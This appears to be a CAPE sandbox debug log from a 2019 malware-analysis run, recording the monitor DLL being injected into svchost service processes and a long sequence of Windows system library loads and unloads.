2019-10-10 02:01:57,874 [root] DEBUG: DLL unloaded from 0x000007FEFBD00000.
2019-10-10 02:01:57,874 [root] DEBUG: DLL loaded at 0x000007FEF7790000: C:\Windows\System32\cscobj (0x3f000 bytes).
2019-10-10 02:01:57,890 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF7790000 to caller regions list.
2019-10-10 02:01:57,905 [root] DEBUG: DLL loaded at 0x000007FEF66C0000: C:\Windows\System32\ncsi (0x38000 bytes).
2019-10-10 02:01:57,921 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2019-10-10 02:01:57,921 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2019-10-10 02:01:57,921 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\system32\fwpuclnt (0x53000 bytes).
2019-10-10 02:01:57,951 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list.
2019-10-10 02:01:57,967 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4950000 to caller regions list.
2019-10-10 02:01:57,967 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAE20000 to caller regions list.
2019-10-10 02:01:57,983 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF66C0000 to caller regions list.
2019-10-10 02:01:57,999 [root] INFO: Stopped Task Scheduler Service
2019-10-10 02:01:57,999 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2019-10-10 02:01:57,999 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-10-10 02:01:58,015 [root] INFO: Started Task Scheduler Service
2019-10-10 02:01:58,029 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:58,029 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFEE90000 to caller regions list.
2019-10-10 02:01:58,029 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:58,029 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAD90000 to caller regions list.
2019-10-10 02:01:58,029 [root] DEBUG: DLL loaded at 0x000007FEF6660000: C:\Windows\System32\srchadmin (0x58000 bytes).
2019-10-10 02:01:58,029 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:58,029 [root] DEBUG: Loader: Injecting process 816 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:58,029 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 820, handle 0x84
2019-10-10 02:01:58,029 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6660000 to caller regions list.
2019-10-10 02:01:58,029 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:01:58,046 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 02:01:58,046 [root] DEBUG: DLL unloaded from 0x000007FEF6660000.
2019-10-10 02:01:58,046 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 02:01:58,046 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:58,046 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:58,046 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2019-10-10 02:01:58,046 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:58,062 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAD70000 to caller regions list.
2019-10-10 02:01:58,062 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:58,062 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:58,062 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:58,062 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:58,076 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 816 at 0x00000000741B0000, image base 0x00000000FFA10000, stack from 0x0000000002E56000-0x0000000002E60000
2019-10-10 02:01:58,076 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-10-10 02:01:58,076 [root] DEBUG: DLL loaded at 0x000007FEF6610000: C:\Windows\system32\webcheck (0x4a000 bytes).
2019-10-10 02:01:58,076 [root] DEBUG: AddTrackedRegion: EntryPoint 0x246c, Entropy 3.672265e+00
2019-10-10 02:01:58,076 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2019-10-10 02:01:58,076 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:58,076 [root] INFO: Added new process to list with pid: 816
2019-10-10 02:01:58,076 [root] INFO: Monitor successfully loaded in process with pid 816.
2019-10-10 02:01:58,092 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 02:01:58,092 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 02:01:58,092 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:58,092 [root] DEBUG: DLL loaded at 0x000007FEF2160000: C:\Windows\system32\IEFRAME (0xbb7000 bytes).
2019-10-10 02:01:58,092 [root] DEBUG: DLL loaded at 0x000007FEF65B0000: C:\Windows\system32\OLEACC (0x54000 bytes).
2019-10-10 02:01:58,108 [root] DEBUG: DLL loaded at 0x000007FEF6570000: C:\Windows\system32\MLANG (0x3b000 bytes).
2019-10-10 02:01:58,108 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF65B0000 to caller regions list.
2019-10-10 02:01:58,140 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF2160000 to caller regions list.
2019-10-10 02:01:58,140 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6570000 to caller regions list.
2019-10-10 02:01:58,154 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6610000 to caller regions list.
2019-10-10 02:01:58,154 [root] DEBUG: DLL unloaded from 0x000007FEF6610000.
2019-10-10 02:01:58,154 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:01:58,171 [root] DEBUG: DLL unloaded from 0x000007FEFBD00000.
2019-10-10 02:01:58,171 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 02:01:58,171 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC500000 to caller regions list.
2019-10-10 02:01:58,171 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-10-10 02:01:58,171 [root] DEBUG: DLL unloaded from 0x000007FEF6660000.
2019-10-10 02:01:58,186 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFE2F0000 to caller regions list.
2019-10-10 02:01:58,186 [root] DEBUG: DLL unloaded from 0x000007FEF66C0000.
2019-10-10 02:01:58,201 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\SXS (0x91000 bytes).
2019-10-10 02:01:58,201 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCF60000 to caller regions list.
2019-10-10 02:01:58,217 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9A00000 to caller regions list.
2019-10-10 02:01:58,217 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2248.
2019-10-10 02:01:58,217 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:58,249 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF97C0000 to caller regions list.
2019-10-10 02:01:58,279 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF80F0000 to caller regions list.
2019-10-10 02:01:58,296 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF90B0000 to caller regions list.
2019-10-10 02:01:58,326 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF98D0000 to caller regions list.
2019-10-10 02:01:58,342 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list.
2019-10-10 02:01:58,358 [root] DEBUG: DLL unloaded from 0x000007FEFA1C0000.
2019-10-10 02:01:58,388 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2800.
2019-10-10 02:01:58,388 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:58,388 [root] DEBUG: DLL loaded at 0x000007FEF6590000: C:\Windows\System32\Actioncenter (0xc2000 bytes).
2019-10-10 02:01:58,404 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6590000 to caller regions list.
2019-10-10 02:01:58,451 [root] DEBUG: CreateThread: Initialising breakpoints for thread 252.
2019-10-10 02:01:58,451 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:58,467 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8070000 to caller regions list.
2019-10-10 02:01:58,483 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF94D0000 to caller regions list.
2019-10-10 02:01:58,483 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1068.
2019-10-10 02:01:58,513 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2160.
2019-10-10 02:01:58,513 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:01:58,700 [root] DEBUG: DLL loaded at 0x000007FEF6360000: C:\Windows\System32\SyncCenter (0x22b000 bytes).
2019-10-10 02:01:58,717 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6360000 to caller regions list.
2019-10-10 02:01:58,717 [root] DEBUG: DLL loaded at 0x000007FEF62E0000: C:\Windows\system32\imapi2 (0x7f000 bytes).
2019-10-10 02:01:58,732 [root] DEBUG: DLL unloaded from 0x000007FEFADB0000.
2019-10-10 02:01:58,732 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF62E0000 to caller regions list.
2019-10-10 02:01:58,779 [root] DEBUG: DLL loaded at 0x000007FEF6280000: C:\Windows\System32\hgcpl (0x55000 bytes).
2019-10-10 02:01:58,795 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6280000 to caller regions list.
2019-10-10 02:01:58,795 [root] DEBUG: DLL loaded at 0x000007FEF66C0000: C:\Windows\System32\provsvc (0x31000 bytes).
2019-10-10 02:01:58,825 [root] DEBUG: DLL loaded at 0x000007FEF9450000: C:\Windows\System32\netprofm (0x74000 bytes).
2019-10-10 02:01:58,825 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9450000 to caller regions list.
2019-10-10 02:01:58,842 [root] DEBUG: DLL unloaded from 0x000007FEF6280000.
2019-10-10 02:02:00,105 [root] DEBUG: DLL loaded at 0x000007FEFB140000: C:\Windows\system32\taskschd (0x127000 bytes).
2019-10-10 02:02:00,105 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB140000 to caller regions list.
2019-10-10 02:02:00,135 [root] DEBUG: DLL unloaded from 0x000007FEF8710000.
2019-10-10 02:02:00,901 [root] DEBUG: DLL unloaded from 0x000007FEF9B80000.
2019-10-10 02:02:01,618 [root] DEBUG: DLL loaded at 0x000007FEF61A0000: C:\Windows\system32\fxsst (0xd7000 bytes).
2019-10-10 02:02:01,650 [root] DEBUG: DLL loaded at 0x000007FEF6100000: C:\Windows\system32\FXSAPI (0x9d000 bytes).
2019-10-10 02:02:01,711 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6100000 to caller regions list.
2019-10-10 02:02:01,743 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF61A0000 to caller regions list.
2019-10-10 02:02:01,759 [root] DEBUG: DLL unloaded from 0x000007FEFB0B0000.
2019-10-10 02:02:01,759 [root] DEBUG: DLL loaded at 0x0000000074680000: C:\Windows\system32\FXSRESM (0xe3000 bytes).
2019-10-10 02:02:01,789 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1644.
2019-10-10 02:02:01,805 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:01,805 [root] DEBUG: DLL unloaded from 0x000007FEFB0B0000.
2019-10-10 02:02:01,805 [root] DEBUG: DLL unloaded from 0x000007FEFB9C0000.
2019-10-10 02:02:02,694 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2872.
2019-10-10 02:02:03,427 [root] DEBUG: DLL unloaded from 0x000007FEFA1C0000.
2019-10-10 02:02:03,427 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-10-10 02:02:03,427 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB0D0000 to caller regions list.
2019-10-10 02:02:03,474 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1332.
2019-10-10 02:02:03,474 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:03,474 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2620.
2019-10-10 02:02:03,522 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4E10000 to caller regions list.
2019-10-10 02:02:03,522 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1672.
2019-10-10 02:02:03,522 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1996.
2019-10-10 02:02:03,522 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1424.
2019-10-10 02:02:03,522 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2956.
2019-10-10 02:02:03,522 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1864.
2019-10-10 02:02:03,536 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2640.
2019-10-10 02:02:03,552 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2784.
2019-10-10 02:02:03,552 [root] DEBUG: CreateThread: Initialising breakpoints for thread 996.
2019-10-10 02:02:03,552 [root] DEBUG: CreateThread: Initialising breakpoints for thread 716.
2019-10-10 02:02:03,568 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2848.
2019-10-10 02:02:03,568 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1112.
2019-10-10 02:02:03,568 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2348.
2019-10-10 02:02:03,568 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2244.
2019-10-10 02:02:03,584 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1920.
2019-10-10 02:02:03,584 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1356.
2019-10-10 02:02:03,584 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2380.
2019-10-10 02:02:03,584 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA0C0000 to caller regions list.
2019-10-10 02:02:03,661 [root] DEBUG: DLL loaded at 0x000007FEF9C00000: C:\Windows\system32\Wlanapi (0x20000 bytes).
2019-10-10 02:02:03,661 [root] DEBUG: DLL loaded at 0x000007FEF9C30000: C:\Windows\system32\wlanutil (0x7000 bytes).
2019-10-10 02:02:03,661 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9C30000 to caller regions list.
2019-10-10 02:02:03,677 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9C00000 to caller regions list.
2019-10-10 02:02:03,677 [root] DEBUG: DLL loaded at 0x000007FEF9BA0000: C:\Windows\system32\wwanapi (0x5e000 bytes).
2019-10-10 02:02:03,693 [root] DEBUG: DLL loaded at 0x000007FEF9B90000: C:\Windows\system32\wwapi (0xd000 bytes).
2019-10-10 02:02:03,693 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9B90000 to caller regions list.
2019-10-10 02:02:03,693 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9BA0000 to caller regions list.
2019-10-10 02:02:03,709 [root] DEBUG: DLL unloaded from 0x000007FEF9BA0000.
2019-10-10 02:02:03,740 [root] DEBUG: DLL loaded at 0x000007FEF5BA0000: C:\Windows\System32\QAgent (0x45000 bytes).
2019-10-10 02:02:03,756 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF5BA0000 to caller regions list.
2019-10-10 02:02:03,770 [root] DEBUG: DLL unloaded from 0x000007FEF6700000.
2019-10-10 02:02:03,786 [root] DEBUG: DLL loaded at 0x000007FEF5390000: C:\Windows\System32\bthprops.cpl (0xb5000 bytes).
2019-10-10 02:02:03,802 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF5390000 to caller regions list.
2019-10-10 02:02:03,802 [root] DEBUG: DLL loaded at 0x000007FEF15A0000: C:\Windows\System32\ieframe (0xbb7000 bytes).
2019-10-10 02:02:03,802 [root] DEBUG: DLL loaded at 0x000007FEF5B40000: C:\Windows\System32\OLEACC (0x54000 bytes).
2019-10-10 02:02:03,818 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF5B40000 to caller regions list.
2019-10-10 02:02:03,818 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF15A0000 to caller regions list.
2019-10-10 02:02:04,785 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\crypt32 (0x11d000 bytes).
2019-10-10 02:02:04,785 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 02:02:04,801 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-10-10 02:02:04,832 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 02:02:04,832 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 02:02:04,848 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 02:02:04,848 [root] DEBUG: DLL loaded at 0x74660000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-10-10 02:02:04,862 [root] DEBUG: DLL loaded at 0x74650000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-10-10 02:02:04,862 [root] DEBUG: DLL loaded at 0x74640000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-10-10 02:02:04,862 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-10-10 02:02:04,878 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 02:02:15,236 [root] DEBUG: DLL loaded at 0x744A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 02:02:15,236 [root] DEBUG: DLL unloaded from 0x000007FEFA9C0000.
2019-10-10 02:02:29,246 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 02:02:29,246 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2940.
2019-10-10 02:02:29,276 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list.
2019-10-10 02:02:37,076 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2940.
2019-10-10 02:02:37,076 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-10-10 02:02:37,076 [root] DEBUG: DLL unloaded from 0x000007FEFB0D0000.
2019-10-10 02:02:37,092 [root] DEBUG: DLL unloaded from 0x000007FEFD360000.
2019-10-10 02:02:37,092 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:37,092 [root] DEBUG: DLL unloaded from 0x000007FEF8ED0000.
2019-10-10 02:02:37,124 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 02:02:37,124 [root] DEBUG: DLL unloaded from 0x000007FEF5700000.
2019-10-10 02:02:37,124 [root] DEBUG: DLL unloaded from 0x000007FEFD1F0000.
2019-10-10 02:02:37,124 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 02:02:37,124 [root] DEBUG: DLL unloaded from 0x000007FEF45C0000.
2019-10-10 02:02:37,186 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-10-10 02:02:37,201 [root] DEBUG: DLL loaded at 0x74CD0000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-10-10 02:02:50,555 [root] DEBUG: DLL loaded at 0x74CC0000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-10-10 02:02:50,555 [root] DEBUG: DLL unloaded from 0x000007FEF9950000.
2019-10-10 02:02:50,555 [root] DEBUG: DLL unloaded from 0x000007FEFB140000.
2019-10-10 02:02:50,571 [root] DEBUG: DLL unloaded from 0x000007FEF4E10000.
2019-10-10 02:02:50,571 [root] DEBUG: DLL unloaded from 0x000007FEF94D0000.
2019-10-10 02:02:50,586 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 02:02:50,835 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list.
2019-10-10 02:02:50,835 [root] DEBUG: DLL unloaded from 0x000007FEF8070000.
2019-10-10 02:02:50,835 [root] DEBUG: DLL unloaded from 0x000007FEF9450000.
2019-10-10 02:02:50,835 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-10-10 02:02:50,868 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1232.
2019-10-10 02:02:50,868 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-10-10 02:02:51,085 [root] DEBUG: DLL loaded at 0x74420000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-10-10 02:02:51,085 [root] DEBUG: DLL unloaded from 0x000007FEFA1C0000.
2019-10-10 02:02:51,101 [root] DEBUG: DLL loaded at 0x74410000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-10-10 02:02:51,132 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-10-10 02:02:51,335 [root] DEBUG: DLL unloaded from 0x74440000.
2019-10-10 02:02:51,351 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 02:02:51,351 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-10-10 02:02:51,367 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-10-10 02:02:51,492 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-10-10 02:02:51,492 [root] DEBUG: DLL unloaded from 0x74420000.
2019-10-10 02:02:51,506 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-10-10 02:02:51,523 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-10-10 02:02:51,523 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-10-10 02:02:51,538 [root] DEBUG: DLL loaded at 0x743F0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-10-10 02:02:51,569 [root] DEBUG: DLL loaded at 0x743E0000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-10-10 02:02:51,631 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-10-10 02:02:51,631 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 02:02:51,631 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 02:02:51,663 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 02:02:51,772 [root] INFO: Stopped WMI Service
2019-10-10 02:02:51,772 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 02:02:51,772 [root] INFO: Attaching to DcomLaunch service (pid 564)
2019-10-10 02:02:51,788 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:02:51,788 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:02:51,803 [root] DEBUG: DLL loaded at 0x74D10000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-10-10 02:02:51,881 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-10-10 02:02:51,897 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:02:51,897 [root] DEBUG: Loader: Injecting process 564 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:51,897 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 02:02:51,897 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:02:51,913 [root] DEBUG: Process dumps disabled.
2019-10-10 02:02:51,927 [root] INFO: Disabling sleep skipping.
2019-10-10 02:02:51,927 [root] DEBUG: DLL loaded at 0x74CA0000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-10-10 02:02:51,944 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:02:51,960 [root] DEBUG: DLL loaded at 0x74CF0000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-10-10 02:02:51,960 [root] WARNING: Unable to hook LockResource
2019-10-10 02:02:51,974 [root] DEBUG: DLL unloaded from 0x74CD0000.
2019-10-10 02:02:51,990 [root] DEBUG: Debugger initialised.
2019-10-10 02:02:51,990 [root] DEBUG: DLL unloaded from 0x74CA0000.
2019-10-10 02:02:52,006 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 564 at 0x00000000741B0000, image base 0x00000000FFA10000, stack from 0x0000000002296000-0x00000000022A0000
2019-10-10 02:02:52,022 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k DcomLaunch.
2019-10-10 02:02:52,022 [root] DEBUG: AddTrackedRegion: EntryPoint 0x246c, Entropy 3.671080e+00
2019-10-10 02:02:52,052 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2019-10-10 02:02:52,069 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:02:52,084 [root] INFO: Added new process to list with pid: 564
2019-10-10 02:02:52,099 [root] INFO: Monitor successfully loaded in process with pid 564.
2019-10-10 02:02:52,115 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 02:02:52,131 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 02:02:52,147 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:54,627 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 02:02:54,642 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1544
2019-10-10 02:02:54,845 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:02:54,845 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:02:54,907 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:02:55,032 [root] DEBUG: Loader: Injecting process 1544 (thread 2368) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:55,048 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:02:55,063 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:55,079 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFA1B000 - 0x000007FEFF430000
2019-10-10 02:02:55,095 [root] DEBUG: InjectDllViaIAT: Allocated 0x210 bytes for new import table at 0x00000000FFA20000.
2019-10-10 02:02:55,095 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:02:55,111 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:55,111 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1544
2019-10-10 02:02:55,125 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:02:55,125 [root] DEBUG: Process dumps disabled.
2019-10-10 02:02:55,157 [root] INFO: Disabling sleep skipping.
2019-10-10 02:02:55,173 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:02:55,188 [root] WARNING: Unable to hook LockResource
2019-10-10 02:02:55,203 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:02:55,220 [root] DEBUG: Debugger initialised.
2019-10-10 02:02:55,298 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 1544 at 0x00000000741B0000, image base 0x00000000FFA10000, stack from 0x0000000000275000-0x0000000000280000
2019-10-10 02:02:55,313 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-10-10 02:02:55,345 [root] DEBUG: AddTrackedRegion: EntryPoint 0x246c, Entropy 3.647981e+00
2019-10-10 02:02:55,359 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2019-10-10 02:02:55,453 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:02:55,453 [root] INFO: Added new process to list with pid: 1544
2019-10-10 02:02:55,453 [root] INFO: Monitor successfully loaded in process with pid 1544.
